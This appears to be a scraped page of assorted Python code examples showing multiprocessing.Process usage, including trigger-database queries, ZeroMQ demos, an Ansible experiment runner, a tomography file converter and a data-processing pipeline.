    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        print("Multiple instances are not allowed")
        exit(0)
    # starting both functions concurrently
    p1 = Process(target=start_logging)
    p2 = Process(target=send_log)
    p1.start()
    p2.start()
Esempio n. 42
0
def rateNameInfo(runLbRanges,mySignal,numProc=1):
	def rateNameWorker(queueIn,queueOut):
		worker = COOLQueryWorker()
		while(1):
			try: run = queueIn.get(False,0.001)
			except Empty:
				sleep(.001)
				continue
			if run is True:
				break
			runLbStart=run<<32
			runLbEnd=runLbStart+1
			nameToChannel={}
			nameToFolder={}
			#L1 Triggers
			folder = worker.getFolder("/TRIGGER/LVL1/Menu")
			folder.setPrefetchAll(False)
			folderIterator = folder.browseObjects(runLbStart,runLbEnd,cool.ChannelSelection())
			while folderIterator.goToNext():
				currentSlice = folderIterator.currentRef()
				nameToChannel[currentSlice.payloadValue('ItemName')] = currentSlice.channelId()
				nameToFolder[currentSlice.payloadValue('ItemName')] = 0
			folderIterator.close()			
			#HLT Triggers
			folder = worker.getFolder("/TRIGGER/HLT/Menu")
			folder.setPrefetchAll(False)
			folderIterator = folder.browseObjects(runLbStart,runLbEnd,cool.ChannelSelection())
			while folderIterator.goToNext():
				currentSlice = folderIterator.currentRef()
				if currentSlice.payloadValue('ChainName').startswith('L2'):
					nameToChannel[currentSlice.payloadValue('ChainName')] = int(currentSlice.payloadValue('ChainCounter'))
					nameToFolder[currentSlice.payloadValue('ChainName')] = 1
				elif currentSlice.payloadValue('ChainName').startswith('EF'):
					nameToChannel[currentSlice.payloadValue('ChainName')] = int(currentSlice.payloadValue('ChainCounter'))
					nameToFolder[currentSlice.payloadValue('ChainName')] = 2
			folderIterator.close()			
			#Totals/Streams
			folder = worker.getFolder("/TRIGGER/HLT/TotalRates")
			folder.setPrefetchAll(False)
			for channel in folder.listChannels():
				nameToChannel[folder.channelName(channel)] = channel
				nameToFolder[folder.channelName(channel)] = 3
			queueOut.put(({run:nameToChannel},{run:nameToFolder}))
		queueOut.put(True)
		return	

	def terminateProcesses(QueryProcesses,troughQueue):
		while 1:
			try:troughQueue.get(False)
			except Empty: break
		logger.critical('Queue is empty')
		for i in range(numProc): troughQueue.put(True)
		time.sleep(1)
		for process in QueryProcesses: 
			process.terminate()
			process.join()
		logger.critical('Processes are joined')
		raise KeyboardInterrupt

	nameToChannel = {}
	nameToFolder = {}

	troughQueue = Queue()
	resultQueue = Queue()

	processes = [Process(target=rateNameWorker,args=(troughQueue,resultQueue,)) for i in range(numProc)]
	for process in processes: process.start()
	
	counter = 0
	target = 0.
	finished = 0
	
	runs = list(set([runLbStart>>32 for runLbStart,runLbEnd in runLbRanges]))

	for run in runs:
		counter+=1
		troughQueue.put(run)
		
	startingQueries = counter

	logger.info('{0} queries distributed over {1} workers'.format(startingQueries,numProc))

	for i in range(numProc): troughQueue.put(True)
	
	try:
		while(1):
			if not mySignal.is_alive():
				raise KeyboardInterrupt
				break
			try: result = resultQueue.get(False,0.001)
			except Empty:
				time.sleep(.001)
				continue
			if result is True:
				finished+=1
				if finished==numProc: break
				continue
			tempNTC,tempNTF = result
			nameToChannel.update(tempNTC)
			nameToFolder.update(tempNTF)
			counter-=1
			percentComplete = min(100,int(round(float(startingQueries-counter)/startingQueries*100+.5)))
			if percentComplete>=target:
				target+=5.
				logger.info('{0}% complete'.format(percentComplete))
	except KeyboardInterrupt:
		logger.critical('Caught signal, terminating processes')
		terminateProcesses(processes,troughQueue)
		
	for process in processes: process.join()

	return nameToChannel,nameToFolder
Esempio n. 43
0
  BS, steps = int(os.getenv("BS", "64" if TINY else "16")), int(os.getenv("STEPS", "2048"))
  print("training with batch size %d for %d steps" % (BS, steps))

  if IMAGENET:
    from datasets.imagenet import fetch_batch
    from multiprocessing import Process, Queue
    def loader(q):
      while 1:
        try:
          q.put(fetch_batch(BS))
        except Exception:
          traceback.print_exc()
    q = Queue(16)
    for i in range(2):
      p = Process(target=loader, args=(q,))
      p.daemon = True
      p.start()
  else:
    X_train, Y_train = fetch_cifar()

  Tensor.training = True
  for i in (t := trange(steps)):
    if IMAGENET:
      X, Y = q.get(True)
    else:
      samp = np.random.randint(0, X_train.shape[0], size=(BS))
      X, Y = X_train[samp], Y_train[samp]

    st = time.time()
    out = model.forward(Tensor(X.astype(np.float32), requires_grad=False))
Esempio n. 44
0
			if timeTupleStart.tm_mday != timeTupleEnd.tm_mday:
				timeLabel = '{0}-{1} {2}'.format(time.strftime('%b. %e',timeTupleStart),time.strftime('%e',timeTupleEnd),timeTupleEnd.tm_year)	
			else:
				timeLabel = time.strftime('%b. %e %Y',timeTupleStart)					
	return timeLabel

#====================================================================================================================
"""
This marks the beginning of the script
"""
#====================================================================================================================


if __name__=='__main__':
	try:
		mySignal = Process(target = waitForReturn, args=(sys.stdin.fileno(),))
		mySignal.start()
	
		logger = logging.getLogger(__name__)
		if args.VERBOSE: logger.setLevel(logging.INFO)

		if args.RUNNUMBER is not None:
			logger.info('Getting runLb range for run(s) {0}'.format(args.RUNNUMBER))
			runLbRanges = runNumberToRunLbRange(args.RUNNUMBER)
			args.FILLNUMBER = None
			args.TIMERANGE = None
		elif args.FILLNUMBER is not None:
			logger.info('Getting runLb range for fill(s) {0}'.format(args.FILLNUMBER))	
			runLbRanges = fillNumberToRunLbRange(args.FILLNUMBER)
			args.RUNNUMBER = None
			args.TIMERANGE = None
Esempio n. 45
0
'''
Created on 2017年2月4日

@author: wangyanyan_b
'''
from multiprocessing import Process
import os


# 子进程要执行的代码
def run_proc(name):
    print('Run child process %s (%s)...' % (name, os.getpid()))


if __name__ == '__main__':
    print('Parent process %s.' % os.getpid())
    p = Process(
        target=run_proc, args=('test', )
    )  # 创建子进程时,只需要传入一个执行函数和函数的参数,创建一个Process实例,用start()方法启动,这样创建进程比fork()还要简单。
    print('Child process will start.')
    p.start()
    p.join()  # join()方法可以等待子进程结束后再继续往下运行,通常用于进程间的同步。
    print('Child process end.')
Esempio n. 46
0
    print "Connecting a server to queue device"
    context = zmq.Context()
    socket = context.socket(zmq.REP)
    socket.connect("tcp://127.0.0.1:%s" % backend_port)
    server_id = random.randrange(1,10005)
    while True:
        message = socket.recv()
        print "Received request: ", message  
        socket.send("Response from %s" % server_id)

def client(frontend_port, client_id):
    print "Connecting a worker #%s to queue device" % client_id
    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://127.0.0.1:%s" % frontend_port)
    #  Do 10 requests, waiting each time for a response
    for request in range (1,5):
        print "Sending request #%s" % request
        socket.send ("Request fron client: %s" % client_id)
        #  Get the reply.
        message = socket.recv()
        print "Received reply ", request, "[", message, "]"

Process(target=server, args=(backend_port,)).start()  

time.sleep(2)
    
for client_id in range(number_of_workers):
    Process(target=client, args=(frontend_port, client_id,)).start()

Esempio n. 47
0
def execute(dag,graph_id,publication_rate,execution_interval,\
  processing_interval,remote_log_dir,local_log_dir,inventory_file,zmq,zk_connector=None):

    #get count of physical nodes present in the test-bed
    nodes = []
    with open(inventory_file, 'r') as f:
        for line in f:
            nodes.append(line.split(' ')[0])

    #get all vertices in DAG
    with open(dag, 'r') as f:
        next(f)  #skip header
        vertices = f.readlines()

    #get count of physical nodes that will be used in the experiment
    if len(vertices) > len(nodes):
        experiment_node_count = len(nodes)
    else:
        experiment_node_count = len(vertices)

    sinks = int(vertices[0].strip().split(';')[5])

    if zmq:
        #start coordinator
        print('ZMQ based implementation')
        coord = coordinator.Coordinate(zk_connector=zk_connector,
                                       graph_id=graph_id,
                                       vertex_count=len(vertices),
                                       sink_count=sinks)
        zk_coordinator = Process(target=coord.run)
        zk_coordinator.start()

    #clean-up remote log directory
    subprocess.check_call(['ansible-playbook','playbooks/clean.yml',\
      '--limit','all[0:%d]'%(experiment_node_count-1),\
      '--inventory',inventory_file,\
      '--extra-vars=dir=%s'%(remote_log_dir)])

    #execute each vertex on a separate device
    for idx, vertex_description in enumerate(vertices):
        if idx >= (len(nodes) - 1):
            node_id = len(nodes) - 1
        else:
            node_id = idx
        if idx == (len(vertices) - 1):
            subprocess.check_call(['ansible-playbook','playbooks/vertex.yml',\
              '--limit','all[%d]'%(node_id),\
              '--inventory',inventory_file,\
              "--extra-vars=detachedMode=False \
        graph_id=%s \
        vertex_description='%s' \
        publication_rate=%d \
        execution_interval=%d \
        log_dir=%s \
        processing_interval=%d \
        zmq=%d"                     %(graph_id,\
              re.escape(vertex_description.strip()),\
              publication_rate,\
              execution_interval,\
              '%s/%s'%(remote_log_dir,graph_id),\
              processing_interval,zmq)])
        else:
            subprocess.check_call(['ansible-playbook','playbooks/vertex.yml',\
              '--limit','all[%d]'%(node_id),\
              '--inventory',inventory_file,\
              "--extra-vars=graph_id=%s \
        vertex_description='%s' \
        publication_rate=%d \
        execution_interval=%d \
        log_dir=%s \
        processing_interval=%d \
        zmq=%d"                     %(graph_id,\
              re.escape(vertex_description.strip()),\
              publication_rate,\
              execution_interval,\
              '%s/%s'%(remote_log_dir,graph_id),\
              processing_interval,zmq)])

    #copy log files from remote devices
    while (not verify('%s' % (local_log_dir), sinks, experiment_node_count)):
        #collect all log files
        subprocess.check_call(['ansible-playbook',\
          'playbooks/copy2.yml',\
          '--inventory',inventory_file,\
          '--limit',\
          'all[0:%d]'%(experiment_node_count-1),\
          '--extra-vars=src_dir=%s/%s/dag dest_dir=%s/dag/'%(remote_log_dir,graph_id,local_log_dir)])

    if zmq:
        zk_coordinator.join()
                    stimulus = cv2.imread(
                        os.path.join(
                            STIMULI_FOLDER, dataset, dataset_subfolder, stimulus_filename
                        ), 0
                    )
                    for model_name in MODELS_LIST:
                        lock = Lock()
                        ps = []
                        for simulated_scanpath_ID in range(NUMBER_OF_SIMULATED_SCANPATHS):
                            ps.append(
                                Process(target=utils.scanpath_single_process,
                                    args=(
                                        lock,
                                        simulated_scanpath_ID,
                                        model_name,
                                        stimulus,
                                        SIMULATED_SCANPATHS_FOLDER,
                                        dataset,
                                        dataset_subfolder,
                                        stimulus_filename
                                    )
                                )
                            )
                            ps[-1].start()

                        for simulated_scanpath_ID in range(NUMBER_OF_SIMULATED_SCANPATHS):
                            ps[simulated_scanpath_ID].join()

                        print("-- -- -- Total execution time:", time.time() - start_time, "s")

Esempio n. 49
0
        def get_data_for_df_test(
            start_date,
            end_date,
        ):
            """
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            #-------------------------------------------------------------------
            test = Multiprocess.test_level
            process_id = 0
            process_instances_ret = []
            queue = JoinableQueue()
            queue_evnt = JoinableQueue()
            date_format = "%m/%d/%Y"

            for date in range(3):
                end_date_o = datetime.strptime(
                    end_date[date],
                    date_format,
                ).date()
                start_date_o = datetime.strptime(
                    start_date[date],
                    date_format,
                ).date()

                process_name = "process_{:03d}".format(process_id)

                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

                process = Process(target=process_inst.run)

                process_id += 1
                Multiprocess.process_cnt += 1
                Multiprocess.process_instances.append(process_inst)
                Multiprocess.processes.append(process)

            for i in range(Multiprocess.process_cnt):
                Multiprocess.processes[i].start()

            for i in range(Multiprocess.process_cnt):
                msg_process_id = None
                msg_from_queue = ""
                while True:
                    msg_from_queue = queue.get()
                    msg_stage_id = msg_from_queue[0]
                    msg_process_id = msg_from_queue[1]
                    process_instances_ret.append(msg_from_queue[2])
                    queue.task_done()
                    break

                Multiprocess.processes[msg_process_id].join()

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            return process_instances_ret
"""
multiprocessing.Process 예제
"""

from multiprocessing import Process

import logger


def say_hello(name):
    logger.info('hello %s', name)


if __name__ == '__main__':
    process1 = Process(target=say_hello, args=('process1', ))
    process2 = Process(target=say_hello, args=('process2', ))
    process1.start()
    process2.start()
    process1.join()
    process2.join()
Esempio n. 51
0
def main(argv):          
	"""
	Converts a TDF file (HDF5 Tomo Data Format) into a sequence of TIFF (uncompressed) files.
	    
	Parameters
	----------
	from : scalar, integer
		among all the projections (or sinogram) data, a subset of the volume can 
		be specified, ranging from the parameter "from" to the parameter "to" 
		(see next). In most cases, this parameter is 0.
		
	to : scalar, integer
		among all the projections (or sinogram) data, a subset of the volume can 
		be specified, ranging from the parameter "from" (see previous parameter) to 
		the parameter "to". If the value -1 is specified, all the projection (or sinogram)
		data will be considered.
		
	in_file : string
		path with filename of the TDF to read from (e.g. "Z:\\sample1.tdf").
		
	out_path : string
		path that will contain the sequence of TIFF files (e.g. "Z:\\sample1\\tomo\\"). WARNING: 
		the program does NOT automatically create non-existing folders and subfolders specified 
		in the path. Moreover, if files with the same name already exist they will be automatically 
		overwritten.
		
	file_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the projection (or 
		sinogram) data. E.g. "tomo" will create files having name "tomo_0001.tif", "tomo_0002.tif".
		
	flat_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the flat (white field)
		data. E.g. "flat" will create files having name "flat_1.tif", "flat_2.tif". If dark or flat data have
		to be skipped the string "-" can be specified.
		
	dark_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the dark (dark field)
		data. E.g. "dark" will create files having name "dark_1.tif", "dark_2.tif". If dark or flat data have
		to be skipped the string "-" can be specified.
		
	projection_order : boolean string
		specify the string "True" to create TIFF files for projections (the most common case), "False" 
		for sinograms.		

	TIFF_format : boolean string
		specify the string "True" to create TIFF files, "False" for RAW files.	

	nr_threads : int
		number of multiple threads (actually processes) to consider to speed up the whole conversion process.
		
	log_file : string
		path with filename of a log file (e.g. "R:\\log.txt") where info about the conversion is reported.

	Returns
	-------
	no return value
		
	Example
	-------
	Example call to convert all the projections data to a sequence of tomo*.tif files:
	
		python tdf2tiff.py 0 -1 "C:\Temp\wet12T4part2.tdf" "C:\Temp\tomo" tomo flat dark True True 3 "C:\Temp\log.txt"
	
	Requirements
	-------
	- Python 2.7 with the latest NumPy, SciPy, H5Py.
	- TIFFFile from C. Gohlke
	- tdf.py
	
	Tests
	-------
	Tested with WinPython-64bit-2.7.6.3 (Windows) and Anaconda 2.1.0 (Linux 64-bit).		

	"""	

	lock = Lock()

	# To be used without flat fielding (just conversion):
	first_done = False	

	# Get the from and to number of files to process:
	int_from = int(argv[0])
	int_to = int(argv[1]) # -1 means "all files"
	   
	# Get paths:
	infile = argv[2]
	outpath = argv[3]
	
	fileprefix = argv[4]
	flatprefix = argv[5]
	darkprefix = argv[6]
	
	if (flatprefix == "-"):
		skipflat = True
	else:
		skipflat = False

	if (darkprefix == "-"):
		skipdark = True
	else:
		skipdark = False

	if (fileprefix == "-"):
		skiptomo = True
	else:
		skiptomo = False
	
	projorder = argv[7]
	if projorder == "True":
		projorder = True
	else:
		projorder = False	
		
	TIFFFormat = argv[8]
	if TIFFFormat == "True":
		TIFFFormat = True
	else:
		TIFFFormat = False	
		
	nr_threads = int(argv[9])
	logfilename = argv[10]
	
	# Check prefixes and path:
	if not outpath.endswith(os.path.sep): outpath += os.path.sep
	
	# Init variables:
	num_files = 0
	num_flats = 0
	num_darks = 0

	# Get the files in infile:
	log = open(logfilename,"w")
	log.write(os.linesep + "\tInput TDF: %s" % (infile))
	if (TIFFFormat):
		log.write(os.linesep + "\tOutput path where TIFF files will be created: %s" % (outpath))		
	else:
		log.write(os.linesep + "\tOutput path where RAW files will be created: %s" % (outpath))		
	log.write(os.linesep + "\t--------------")			
	log.write(os.linesep + "\tFile output prefix: %s" % (fileprefix))
	log.write(os.linesep + "\tFlat images output prefix: %s" % (flatprefix))
	log.write(os.linesep + "\tDark images output prefix: %s" % (darkprefix))
	log.write(os.linesep + "\t--------------")	
	
	if (not (skiptomo)):
		if (int_to != -1):
			log.write(os.linesep + "\tThe subset [%d,%d] of the data will be considered." % (int_from, int_to))
	
		if (projorder):
			log.write(os.linesep + "\tProjection order assumed.")
		else:
			log.write(os.linesep + "\tSinogram order assumed.")
	
		log.write(os.linesep + "\t--------------")	
	log.close()	

	if not os.path.exists(infile):		
		log = open(logfilename,"a")
		log.write(os.linesep + "\tError: input TDF file not found. Process will end.")				
		log.close()			
		exit()	

	# Open the HDF5 file:
	f = getHDF5(infile, 'r')
	
	oldTDF = False
	
	try:		
		dset = f['tomo']			
		oldTDF = True
		
	except Exception:
		
		pass
		
	if not oldTDF:
		
		#try:
			dset = f['exchange/data']
			
		#except Exception:
			
		#	log = open(logfilename,"a")
		#	log.write(os.linesep + "\tError: invalid TDF format.  Process will end.")
		#	log.close()
		#	exit()
	
	if projorder:
		num_files = tdf.get_nr_projs(dset)	
	else:
		num_files = tdf.get_nr_sinos(dset)			
	f.close()
	


	# Get attributes:
	try:
		f = getHDF5(infile, 'r')
		if ('version' in f.attrs) and (f.attrs['version'] == 'TDF 1.0'):	
			log = open(logfilename,"a")
			log.write(os.linesep + "\tTDF version 1.0 found.")
			log.write(os.linesep + "\t--------------")
			log.close()
		f.close()				
			
	except:		
		log = open(logfilename,"a")
		log.write(os.linesep + "\tWarning: TDF version unknown. Some features will not be available.")				
		log.write(os.linesep + "\t--------------")
		log.close()			

	# Check extrema (int_to == -1 means all files):
	if ((int_to >= num_files) or (int_to == -1)):
		int_to = num_files - 1
		


	# Spawn the process for the conversion of flat images:
	if not skipflat:

		f = getHDF5(infile, 'r')
		if oldTDF:
			dset_str = 'flat'
		else:
			dset_str = 'exchange/data_white'
		num_flats = tdf.get_nr_projs(f[dset_str])
		f.close()	

		if (num_flats > 0):
			Process(target=_process, args=(lock, 0, num_flats - 1, infile, dset_str, TIFFFormat, 
											True, outpath, flatprefix, logfilename)).start()
			#_process(lock, 0, num_flats - 1, infile, dset_str, TIFFFormat, projorder,
			#outpath, flatprefix, logfilename)

	# Spawn the process for the conversion of dark images:
	if not skipdark:

		f = getHDF5(infile, 'r')
		if oldTDF:
			dset_str = 'dark'
		else:
			dset_str = 'exchange/data_dark'
		num_darks = tdf.get_nr_projs(f[dset_str])
		f.close()	

		if (num_darks > 0):
			Process(target=_process, args=(lock, 0, num_darks - 1, infile, dset_str, TIFFFormat, 
											True, outpath, darkprefix, logfilename)).start()
			#_process(lock, 0, num_darks - 1, infile, dset_str, TIFFFormat, projorder,
			#outpath, darkprefix, logfilename)

	# Spawn the processes for the conversion of projection or sinogram images:
	if not skiptomo:

		if oldTDF:
			dset_str = 'tomo'
		else:
			dset_str = 'exchange/data'
		
		# Start the process for the conversion of the projections (or sinograms) in a
		# multi-threaded way:
		for num in range(nr_threads):
			start = ((int_to - int_from + 1) / nr_threads) * num + int_from
			if (num == nr_threads - 1):
				end = int_to
			else:
				end = ((int_to - int_from + 1) / nr_threads) * (num + 1) + int_from - 1

			Process(target=_process, args=(lock, start, end, infile, dset_str, TIFFFormat, 
											projorder, outpath, fileprefix, logfilename)).start()
Esempio n. 52
0
    def run_subprocessed():
        """
        This function retrieves required data in a multiprocessed fashion.
        """
        def subprocess_manage(queue):
            """
            This functions works as a multiprocess pool supplement.
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.subprocess_manage",
                ))

            #-------------------------------------------------------------------
            start_allowed = True
            processes_fin = Multiprocess.process_cnt
            stage_id_fin = Multiprocess.stage_fin - 1

            #--Start cpu_cnt/process_cnt subprocesses on first stage------------
            if Multiprocess.cpu_cnt > Multiprocess.process_cnt:
                Multiprocess.cpu_cnt = Multiprocess.process_cnt

            for i in range(Multiprocess.cpu_cnt):
                Multiprocess.processes[i].start()
                Multiprocess.process_last_started += 1

                if not Multiprocess.processes[i].is_alive():
                    Multiprocess.logger.error(
                        "{}[{}process_{:03}/{:03}{}]   {}   Not running".
                        format(cs.RES, cs.PRGnBA, i,
                               Multiprocess.process_cnt - 1, cs.RES,
                               "[stage_id      0]"))

            process_id = Multiprocess.cpu_cnt - 1
            Multiprocess.logger.debug(
                "{}[{}process_{:03}{}-{}{:03}{}]   {}   {} ".format(
                    cs.RES,
                    cs.PRGnBA,
                    0,
                    cs.RES,
                    cs.PRGnBA,
                    Multiprocess.cpu_cnt - 1,
                    cs.RES,
                    "                 ",
                    "{}Started processes on first stage".format(cs.WHI),
                ))

            #--retrieve subprocess results--------------------------------------
            while processes_fin > 0:
                # print some status message-------------------------------------

                Multiprocess.logger.debug(
                    "{}[{}process_xxx/{:03}{}]   {}   {}".format(
                        cs.RES,
                        cs.PRGnBG,
                        Multiprocess.process_cnt - 1,
                        cs.RES,
                        "                 ",
                        "{}retrieving results".format(cs.WHI),
                    ))

                # handle queue data---------------------------------------------
                msg_from_queue = queue.get()
                msg_stage_id = msg_from_queue[0]
                msg_process_id = msg_from_queue[1]
                msg_result = msg_from_queue[2]
                msg_process_id_str = "{}[{}process_{:03}/{:03}{}]   {}".format(
                    cs.RES,
                    cs.PRGnBG,
                    msg_process_id,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        msg_stage_id,
                    ),
                )

                Multiprocess.process_result[msg_process_id][
                    msg_stage_id] = msg_result

                Multiprocess.logger.info("{}   {}results retrieved".format(
                    msg_process_id_str,
                    cs.PRGnBG,
                ))
                queue.task_done()

                if msg_stage_id == 0:
                    Multiprocess.queue_evnt[msg_process_id].put([
                        msg_stage_id,
                        msg_process_id,
                    ])

                # mark process as finished if all its stages are finished-------
                elif msg_stage_id == stage_id_fin:
                    Multiprocess.processes[msg_process_id].join()
                    processes_fin -= 1

                    Multiprocess.logger.info("{}   {}terminated/joined".format(
                        msg_process_id_str,
                        cs.PRGnBF,
                    ))

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.subprocess_manage",
                ))

            return

        def concatenate(stage_id):
            """
            This function serves as a framework to concatenate results
            from subprocesses in order correctly.
            """
            def ds_cat(
                ds_res,
                ds_nxt_id,
                ds_nxt,
                process_name,
                stage_id,
            ):
                """
                This function concatenates two given data structures.
                """
                if ds_nxt_id != Multiprocess.cat_nxt[stage_id]:
                    Multiprocess.logger.error(
                        "{}[{}{}/{:03}{}]   {}   {}".format(
                            cs.RES,
                            cs.PRGnBE,
                            process_name,
                            Multiprocess.process_cnt - 1,
                            cs.RES,
                            "{}[stage_id     {:2}]".format(
                                cs.WHI,
                                stage_id,
                            ),
                            "ds_nxt_id != Multiprocess.cat_nxt",
                        ))
                    return

                Multiprocess.cat_nxt[stage_id] += 1

                #initial setup
                if ds_nxt_id == 0:
                    Multiprocess.logger.info(
                        "{}[{}{}/{:03}{}]   {}   {}".format(
                            cs.RES,
                            cs.PRGnBH,
                            process_name,
                            Multiprocess.process_cnt - 1,
                            cs.RES,
                            "{}[stage_id     {:2}]".format(
                                cs.WHI,
                                stage_id,
                            ),
                            "{}data appended".format(cs.PRGnBH),
                        ))

                    return ds_nxt

                ds_new = {}

                for i, v in ds_res.items():
                    if type(ds_nxt[i]) == list:
                        ds_new[i] = ds_res[i] + ds_nxt[i]

                    elif type(ds_nxt[i]) == DatetimeIndex:
                        ds_new[i] = ds_res[i].append(ds_nxt[i])

                    else:
                        ds_new[i] = concatenate([ds_res[i], ds_nxt[i]])

                Multiprocess.logger.info("{}[{}{}/{:03}{}]   {}   {}".format(
                    cs.RES,
                    cs.PRGnBH,
                    process_name,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        stage_id,
                    ),
                    "{}data appended".format(cs.PRGnBH),
                ))

                return ds_new

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.concatenate",
                ))

            #-------------------------------------------------------------------
            process_result_cat = []
            time_to_wait_if_alive = 0.1
            time_to_wait_if_none = 0.1
            while Multiprocess.cat_nxt[stage_id] < Multiprocess.process_cnt:
                cat_nxt = Multiprocess.cat_nxt[stage_id]
                process_name_nxt = Multiprocess.process_instances[
                    cat_nxt].process_name
                process_name_nxt_str = ("{}[{}{}/{:03}{}]   {}".format(
                    cs.RES,
                    cs.PRGnBE,
                    process_name_nxt,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        stage_id,
                    ),
                ))
                #-process that would produce the next results to be concatenated
                #-...was not started yet => continue----------------------------
                if cat_nxt > Multiprocess.process_last_started:
                    continue

                #-...was started and is still running => continue---------------
                if Multiprocess.processes[cat_nxt].is_alive():
                    time_sleep = time_to_wait_if_alive + 2
                    sleep(time_sleep)
                    if time_sleep <= 20:
                        time_to_wait_if_alive *= 2
                    elif time_sleep <= 60:
                        time_to_wait_if_alive += 10

                    if time_to_wait_if_alive > 3.2:
                        Multiprocess.logger.info("{}   {}still running".format(
                            process_name_nxt_str,
                            cs.PRGnBE,
                        ))
                    continue

                #-...finished, but did not produce a result => major error------
                time_to_wait_if_alive = 0.1
                if Multiprocess.process_result[cat_nxt][stage_id] is None:
                    sleep(time_to_wait_if_none)
                    time_to_wait_if_none *= 2

                    if time_to_wait_if_none > 3.2:
                        Multiprocess.logger.warning(
                            "{}   {}no results yet!".format(
                                process_name_nxt_str, ))
                    elif time_to_wait_if_none > 6.4:
                        Multiprocess.logger.error("{}   no results!".format(
                            process_name_nxt_str, ))
                        Multiprocess.processes_kill_all()
                        exit(-1)

                    continue

                #-...is finished and results are ready for concatenating--------
                time_to_wait_if_none = 0.1
                if Multiprocess.test_level == -1:
                    sleep(0.2)

                if True:
                    process_result_cat = ds_cat(
                        process_result_cat,
                        cat_nxt,
                        Multiprocess.process_result[cat_nxt][stage_id],
                        process_name_nxt,
                        stage_id,
                    )

                    Multiprocess.process_result[cat_nxt][stage_id] = None

            #--give thread_subprocess_manage time to return---------------------
            sleep(2)

            if thread_subprocess_manage.is_alive():
                Multiprocess.logger.warning("Exiting concat to early!")
                sleep(2)

            # return final results----------------------------------------------
            if stage_id == Multiprocess.stage_fin - 1:
                Multiprocess.process_result_cat_fin = process_result_cat

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.concatenate",
                ))

            return

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.run_subprocessed",
        ))

        #-----------------------------------------------------------------------
        process_id = 0
        start_allowed = True
        cat_finished = False
        queue = JoinableQueue()
        start_date_o = datetime.strptime(Velo.start_date, "%m/%d/%Y").date()
        end_date_o = datetime.strptime(Velo.end_date, "%m/%d/%Y").date()

        s_p_d = Velo.f_dates_of_id_sub_proc
        Multiprocess.process_cnt = len(s_p_d)
        Velo.process_cnt = Multiprocess.process_cnt

        if Multiprocess.process_cnt > Multiprocess.cpu_cnt:
            Velo.logger.error(
                "Too many processes ({}) for only {} cpu's!".format(
                    Multiprocess.process_cnt,
                    Multiprocess.cpu_cnt,
                ))
            exit(-1)

        # setup processes/instances---------------------------------------------
        for date in range(Multiprocess.process_cnt):
            date_period = s_p_d[date][2]
            if date_period <= 0:
                continue

            queue_evnt = JoinableQueue()
            process = []
            process_name = "process_{:03d}".format(process_id)
            process_inst = None

            if Multiprocess.test_level == 0:
                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

            if Multiprocess.test_level == -1:
                process_inst = MultiprocessTest(
                    process_id=process_id,
                    process_name=process_name,
                    queue_evnt=queue_evnt,
                    queue=queue,
                    date_id=date,
                )

            process = Process(target=process_inst.run)

            Multiprocess.process_instances.append(process_inst)
            Multiprocess.processes.append(process)
            Multiprocess.process_result.append([])
            Multiprocess.queue_evnt.append(queue_evnt)

            for stage_id in range(Multiprocess.stage_fin):
                Multiprocess.process_result[-1].append(None)

            process_id += 1

        thread_subprocess_manage = Thread(
            target=subprocess_manage,
            args=(queue, ),
        )

        thread_concatenate = []

        #for stage_id in range(Multiprocess.stage_fin):
        thread_concatenate.append(
            Thread(
                target=concatenate,
                args=(
                    #stage_id,
                    1, ),
            ))

        thread_subprocess_manage.start()

        #--concatenate all consecutive results----------------------------------
        for thread in thread_concatenate:
            thread.start()

        for thread in thread_concatenate:
            thread.join()

        # getting final results-------------------------------------------------
        process_result_cat = Multiprocess.process_result_cat_fin

        thread_subprocess_manage.join()

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.run_subprocessed",
        ))

        return process_result_cat
        # First Step doesn't contains jointAngles
        if len(jointAngles):
            # Real Actuators
            controller.servoRotate(jointAngles)
            
            # # Plot Robot Pose into Matplotlib for Debugging
            # TODO: Matplotplib animation
            # kn.initFK(jointAngles)
            # kn.plotKinematics()

        robot.step()
        consoleClear()


